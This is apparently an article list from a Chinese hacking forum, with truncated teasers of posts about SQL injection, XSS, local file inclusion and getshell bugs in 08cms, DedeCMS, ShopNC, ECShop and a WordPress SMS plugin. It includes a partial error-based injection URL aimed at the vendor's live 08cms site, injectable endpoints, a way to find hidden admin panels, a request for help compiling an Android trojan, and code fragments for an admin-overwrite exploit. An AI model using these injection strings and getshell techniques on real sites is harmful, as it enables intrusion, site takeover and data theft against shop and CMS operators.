文章列表
08cms 注入漏洞
以前看到的,测试下官网还可以。网上看到还没有,大牛们估计早收好了。可能是没有开源漏洞挺多的。小菜文章,谢绝转载,谢谢。http://auto.08cms.com/search.php?chid=1&carsfullname=aa&searchmode=subject&orderby=aid%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand
dede一个鸡肋的找后台
转载请标记 作者 AK Q 8528**8url:data/mysql_error_trace.inc 记录数据连接错误的一个文件, 记录后台错误可能性还是比较大的,~最少碰到找不到后台的基本是1可以用这个找到。 注入竟然也看到了 确实鸡肋!可以保存一下,阅读金币就算了。不敢要啊..........
shopnc v2.1 注入day.
/index.php?act=member_flea&op=drop_goods&goods_id=1求后台拿shell的方法.
求android基友帮忙编译个东西,安卓的木马
嗯。这是图片需要在androidforJava下进行编译,本屌不会求基友编译......
发个WP-Sendsms的XXS漏洞
从国外网站译下来的,大家看看哈。WP-Sendsms是一款wordpress 的发送短信的插件,插件有自己的配置页面,可以配置sms的网关。这个XXS漏洞允许你通过跨站请求漏洞触发来修改网关配置。XSS地址http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms攻击代码如下:<html><head><script
dedecms漏洞getshell EXP最新可用
看贴不回,没JJ漏洞大家都知道是哪个。其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?getshell 很容易 。 既然刚发出来的是 sql
ECShop的一个getshell
在很久很久以前 这个漏洞就已经存在了,但是由于demo/这个目录一般都已经被删除了,所以挺鸡肋的。昨天看到有同学发了一个demo/目录下的 本地包含(无法截断的情况下,实在没有太大意义),所以我就在回复中提了这个漏洞,原来我以为,出于技术交流目的,那提示已经完全足够了,后来发现我错了{:6_440:
ECShop网店系统最新版本地包含漏洞
ECShop网店系统最新版本地包含漏洞 BY:风之传说这个洞,其实我在2012年1月的时候看ecshop就分析出来过,当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的,没想到还存在。Seay大牛的微博说,靠他的神器挖出一个漏洞,不知道是不是我找的这个,仔细看了下,他那个是GET提交的,应该不是我这个。
我来说说最新这个dedecms getshell 不成功的原因吧
如题直接给代码data/config.cache.inc.php$cfg_mysql_type = 'mysql';include/common.inc.php//引入数据库类if ($GLOBALS == 'mysqli' && function_exists("mysqli_init")) //如果配置的是 mysql 或者 mysqli_init() 支持这个函数 都是可以成功的{ require_once(DEDEINC.'/dedesqli.class.php');} e
dedecms最新版本修改任意管理员漏洞
此漏洞无视gpc转义,过80sec注入防御。起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。include/dedesql.class.php if(isset($GLOBALS)) { $v1 = $v2 = ''; for($i=0;isset($arrs1);$i++) { $v1 .= chr($arrs1); } for($i=0;isset($arrs2);$i++)
